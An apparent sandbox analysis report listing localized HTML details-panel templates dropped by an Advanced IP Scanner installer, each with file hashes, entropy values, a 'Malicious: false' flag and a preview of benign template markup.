Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1153
Entropy (8bit):	4.877089271030429
Encrypted:	false
SSDEEP:	12:AMJnuKoB2kV2B2uT2Bw2MKb2t52HcqQ2RCz282n0Kt1RhRGDbVzY1OzAkReEiWyv:lFosFsuS5XqiHJlL0Kt5RGDxReEhyv
MD5:	1D0D5C190B173CB0BED10C8B2E0F9697
SHA1:	83C10675F5A010668F4A278115BBC120F70EC99B
SHA-256:	F45A1EFA7DE1EE6ABA559166B744E6398A5BF5233EE3954E0A4BD3EB0904CE3F
SHA-512:	94E47E83159A43849DC269936D2B5E4866FB0C84DFDBB02664018CFCDBEDE06179F32324EE236910B4E2FEADC110F39EFD083A0F95B221E1D48A41A35E2C37FF
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robce:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ivatel:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Pozn.mky:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnosti</ce

C:\Program Files (x86)\Advanced IP Scanner\details_panel_da_dk.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	4.790118218856679
Encrypted:	false
SSDEEP:	24:lFouisuSqZXqk/HuW4/0Kt5RGD3ReEhyv:HnisRqZXqmHuWK0U2DNs
MD5:	5AD712B9C416EE21623D620AB6019FB4
SHA1:	51DF096A58D6DF2A7CE33E22511C671883F2228C
SHA-256:	38D4DEAFB763B288A9A2322F4BE6E58909427ECFD025CAF0FDEB537C9880AA21
SHA-512:	608A2240E6F26C9F4A41A3A9B8D6EFCF4DC7735916CD58DFFC2AAC8948889515C2647F11DCF09FF9F0FC9245C7E09B548348B2B89925162EDE288FB0B74217E8
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruger:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Oplysninger</cent

C:\Program Files (x86)\Advanced IP Scanner\details_panel_de_de.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1153
Entropy (8bit):	4.788912446448768
Encrypted:	false
SSDEEP:	24:lFouzisuSpI/XqOQ/HJla0Kt5RGDFTHReEhyv:HnesRpaXqOyHJla0U2DFJs
MD5:	FBA663967DF5DD4AB38D38DA1362598E
SHA1:	9557B768C03EB179FDEBB5F74724985F51685203
SHA-256:	466C8D1C6798F392281C81AF34638C334489AB56C7DB86A3A23B1EDB2918C2DA
SHA-512:	427505B6A8278CF009E4051D458BDABCBBE83B9D8B279FB7267777403E50BF26570D1FBD6EB4CD73E6F28E5565CEEA2B02B1EC3197FD85E78B5B0AB932FAC2D1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Betriebssystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Hersteller:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anwender:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Art:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentare:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Dienst</center></b></td><td><b><center>Ausf.hrlich</ce

C:\Program Files (x86)\Advanced IP Scanner\details_panel_el_gr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1256
Entropy (8bit):	5.1672203710221565
Encrypted:	false
SSDEEP:	24:lFoDdHxqsuSTBXq0QH1R7y0Kt5RGDxD0nIgReEhyv:HeHQsR9XqVH1Re0U2DCds
MD5:	38E55188530EE1FC3B88A22697957911
SHA1:	BDF54BFF5183DEE6D233B521CFF1DBAB6D46BAA7
SHA-256:	EBD614652D83E094756B7E5490105E340FFE27C2664CF0DC4D3626C92E2AB6B4
SHA-512:	F8A603C8C5803B293B37E58AFE3845D187DD894799C9745AEF7F93785A9064BF81D45CEACC27E68F1B263C1769660E95E61D0E5C0B6EFEAED3FFE274A9016CD3
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>........... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..........:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\details_panel_en_us.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1147
Entropy (8bit):	4.784372507341765
Encrypted:	false
SSDEEP:	24:lFourZsuSd/Xqk/Hu0B10Kt5RGDz9ScReEhyv:HnrZsRhXqmHu410U2Dz9S+s
MD5:	04C416BEC9FE7DEC52E2F368353FF1F9
SHA1:	DB86325EDF8EED3639A26ED279A00EBC9208ED1E
SHA-256:	10946712CE123E177350A9D96F61B2011FFCCC90597880F256E3A24676CD4B30
SHA-512:	4069E9327ED9BE5FA81EF9A7148959B376677710D8D77CE1B247AF5065C1E7B2CC50561E47F7AEBA2DA48A8FBC79752147CCF262A8C1E6A66408ACFF07489E29
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operating system:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Manufacturer:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>User:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comments:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</center><

C:\Program Files (x86)\Advanced IP Scanner\details_panel_es_es.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1173
Entropy (8bit):	4.837006163390497
Encrypted:	false
SSDEEP:	24:lFoSb9bqsuShXqRHRM9BHBl0Kt5RGDhC+6ReEhyv:Hpb9bqsRhXqRHwBhl0U2Dw+As
MD5:	3DF24E832E07A361EE154A0635DF60F7
SHA1:	B02EDAA0C6B997830669B6FF1A3C6FB43331CFD3
SHA-256:	7A0B4383F55B6D2D52869CD50951FDE5ABE94208DE076161D12F7702537F37EA
SHA-512:	C8E81AFCF8E26086E83E410F158C46336CDB039014FDB1686F5E039032E044B87EBFEF1E9E71CBA34FA6D0F24EFE914A4AE180A61CB80E619C18BBE1D6ACAD2C
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Estado:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usuario:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Fecha:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Comentarios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servicio t.cnico</center></b></td><td><b><center>M

C:\Program Files (x86)\Advanced IP Scanner\details_panel_et_ee.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1150
Entropy (8bit):	4.850275626289269
Encrypted:	false
SSDEEP:	24:lForPQsuSRBXqDH03Rrh0Kt5RGDVx3rgReEhyv:HyPQsRRBXqDHyRt0U2DVtras
MD5:	6B21CA02EF7F5C3E6641DBB222A207DC
SHA1:	215CE642734FDA5004F603E593FAA2EB70663500
SHA-256:	3B0A1534FFEF9FB0B1BA169DDA53E26A940E0C644A47D8567E4E804D3DFADF24
SHA-512:	A61FEAEBB6819C6B2CCC8120FB5E64CE71E8399C19221255FB7C3BCB9F557291A75CF965704003A7EA748753097B9E43D0548C1ACC9FE76DA490F70D55B85461
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Olek:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Ops.steem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Tootja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kasutaja:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T..p:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Kuup.ev:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentaarid:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Teenus</center></b></td><td><b><center>.ksikasjad</cente

C:\Program Files (x86)\Advanced IP Scanner\details_panel_fa_ir.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1751
Entropy (8bit):	4.952964955431726
Encrypted:	false
SSDEEP:	48:ngn27UxzUZMUejUC3UCIUZzoUH0iUvoU7wpYlUQwU2DY4IO:gjmhfd0t07cqyOoIO
MD5:	23760926BFC668193D027DB24E198051
SHA1:	FF7AC19A7113F2DAA66B20C310A09752620E6455
SHA-256:	2E4A9A21A7D3444008849936F5473F78CB4DB93E9EE0992F023767B682300635
SHA-512:	F4B91BA666141C00C2282F2DCB3D5EB75F709A8E58D4DBF8992DAF17A1F163E019D1843A3A2441F392A46E4B9397666B5AD3CC76385BA3DF6897105250506E33
Malicious:	false
Preview:	<hr>..<h3 align="right" style="margin-right:2em">{name}</h3><p></p>..<table align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right"><b>..... ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right"><b>......: ....:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right"><b>NetBIOS:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{user}</td><td dir="rtl" align="right"><b>.....:</b></td></tr>...<tr><td

C:\Program Files (x86)\Advanced IP Scanner\details_panel_fi_fi.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1168
Entropy (8bit):	4.8708624632073105
Encrypted:	false
SSDEEP:	24:lFokVpsuS4XqW1H5l+Ah1j0Kt5RGDLDiReEhyv:H9VpsR4XqW1H5lBh1j0U2DLDos
MD5:	6A9A7FB51DD16A4EDBEAF52A7567EA70
SHA1:	27B2444894F6B432AD36CB14D79BAD1BA6529887
SHA-256:	C4AD3344E412976BD9F7B8DDC8C60FDB94461201C814529CC5300FFDEB35BC08
SHA-512:	E627B085002A98E4C899FB4B9C7F4A90531C2D25233E3AD1ED0C4BFA87D0DE7D8E38F07D3CD0130955670D9C5F50F1D2BA40BBDF355F0FD202B1CE278A734F54
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tila:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>K.ytt.j.rjestelm.:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Valmistaja:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>K.ytt.j.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tyyppi:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>P.iv.m..r.:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentit:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Palvelu</center></b></td><td><b><ce

C:\Program Files (x86)\Advanced IP Scanner\details_panel_fr_fr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1163
Entropy (8bit):	4.810701494539991
Encrypted:	false
SSDEEP:	24:lFo3WsuSsXq9e/Hu0Bk0Kt5RGDzLcReEhyv:HeWsRsXqqHu4k0U2DzL+s
MD5:	C6CEF752D7D9FD44C45C67AE637EC697
SHA1:	AD7D24492C5B44BBD96C0705308548BE46B5A743
SHA-256:	4A9255685D393748B0E36243601E546222C005F1D24C99C97CDB3B926A27BC5D
SHA-512:	0F4D2C69D548E5550A93CE5A8D8C58A6449D4432F561554ABA54880C154999D11360412CF15DED3261EA485C49976F173A49C211C22C2D80E8BFBACF981C168D
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statut:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Syst.me d'exploitation:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilisateur:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commentaires:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>D.

C:\Program Files (x86)\Advanced IP Scanner\details_panel_he_il.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2080
Entropy (8bit):	4.902799949328129
Encrypted:	false
SSDEEP:	48:b1+7UxUhUZU+UeUQUCUyUCUJUZUUoUH0UAUvUlU7UJUQU+UYD8UCtZUn+:xL+O2Z5bNdNG2y/rMyYGb6Ct2n+
MD5:	64D0C8B9E985CFD51786E85509000617
SHA1:	65FC3558C0BED0CDECFCDAF9BA55F7EFACCBC694
SHA-256:	F3A60BD72994B19FB680F5071DAA675A6A07FE3805522F26456958A260999FCD
SHA-512:	DEB626895CC5C445F99214F26FB605BD5D9787E0545224A5E2B51E33371B9A6E88533E5F443FE72B619959391BA5183C40EC50F76D46BD1313BB062EA0679F96
Malicious:	false
Preview:	<hr>..<h3 dir="rtl" align="right" style="margin-left:2em">{name}</h3><p></p>..<table dir="rtl" align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right" style="padding-left:1em"><b>.....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right" style="padding-left:1em"><b>..... .....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right" style="padding-left:1em"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right" style="padding-left:1em"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right" style="padding-left:1em"><b>....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right" style="padding-left:1em"><b

C:\Program Files (x86)\Advanced IP Scanner\details_panel_hr_hr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1158
Entropy (8bit):	4.839285803199877
Encrypted:	false
SSDEEP:	12:AMJnuKov2Fke2B2uT2Bxc+2MKb2tq2HcA2RCz282n0Kt1RhRGDbgzY1pvzAkReEs:lFouAsuSMBXqHH+lL0Kt5RGDjReEhyv
MD5:	1D24AAD630182B5018D26EE86FF9E1E5
SHA1:	D0FFCE32DEB2A2B5BD98274D2D74B135855243F1
SHA-256:	ED422482346F25140F3A4BC2B76225E64C0FB697FC4D9A0691F2B546E041D374
SHA-512:	D943A02304C8EBA2306830FCCDAEB033E7C8D9AB5F385DC57ED5AB3B08B20B8EF343F28D6DC12990B62A718B3B96885A7E9893D29A0ACA6E7FDDDD29AFD8E5F5
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sustav:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Pojedinost

C:\Program Files (x86)\Advanced IP Scanner\details_panel_hu_hu.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1177
Entropy (8bit):	4.903797892947706
Encrypted:	false
SSDEEP:	24:lFoybd/suSYXqZqH0vi4cS0Kt5RGDAM9ReEhyv:HH9sRYXqYHqSS0U2DAes
MD5:	5F29203D51A1A790B22063DE29E377AC
SHA1:	C0EDB2A7108E532E66D7B730466022403C64F50D
SHA-256:	C698D74D598B66CBDA7E11B80A6179AAD54AC7CCBA7127E517E4B5AC9FF4C6CD
SHA-512:	D451ADA494D387FA540F90C4F767451463ADFA3B81416E99DE14F2FCC39DD586677E359B0151CA8892BB18F847821D7B002F00D85886909A4F01D094195A27FC
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.llapot:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.ci.s rendszer:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gy.rt.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Felhaszn.l.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.pus:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Megjegyz.sek:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Szolg.ltat.s</center></b></td><td><

C:\Program Files (x86)\Advanced IP Scanner\details_panel_id_id.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1148
Entropy (8bit):	4.7922327669232505
Encrypted:	false
SSDEEP:	24:lFoufsuSqJXqL0He3yk/0Kt5RGDNsm6ReEhyv:HnfsRqJXqL0He3ym0U2D+mAs
MD5:	88B009CCACF0EB1B4A141470D3F160C4
SHA1:	EE0D1A44562CCDEDBCDE92D232FA541F53826B4B
SHA-256:	D2254ED99166A12CE00F93379142ACFCBF9A49AF3FB8789E8215B0C1CCCB4587
SHA-512:	D07C7B90A12E7E48A90BF450A57E4479AE5BB130EFE9950A316D9A7AB9063D94AF0F35942925ACA41A7C2C149A0F31A075C38DD0B34821F88BD81588660D0BE1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem operasi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsen:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pengguna:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipe:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tanggal:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Layanan</center></b></td><td><b><center>Rincian</center>

C:\Program Files (x86)\Advanced IP Scanner\details_panel_it_it.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1149
Entropy (8bit):	4.78207214825378
Encrypted:	false
SSDEEP:	24:lFoBbqsuSqrXq9CHRM9830Kt5RGDeqVReEhyv:HSbqsRqrXqgHw830U2D9Xs
MD5:	470C4551612D8025E2C1FF7129C75577
SHA1:	BA632F06A6C8A7A3E7E53FD6359BEDF2136399BB
SHA-256:	8C04F3998E1827EE98EDB0D17A591F507F75478C88B8A98DA5FABD55DDCFA18E
SHA-512:	21D3AD77522C40E2E4B5C75805EA8460EF6C1ABC4DAA7BD95E1AA7B5387DDA83589EF8A1DA6A915B975524C8B2081CEEF274AD87C3EE1E4EFD02C581D1D33A6C
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stato:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produttore:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utente:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commenti:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servizio</center></b></td><td><b><center>Dettagli</center

C:\Program Files (x86)\Advanced IP Scanner\details_panel_ja_jp.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1187
Entropy (8bit):	5.11658152620251
Encrypted:	false
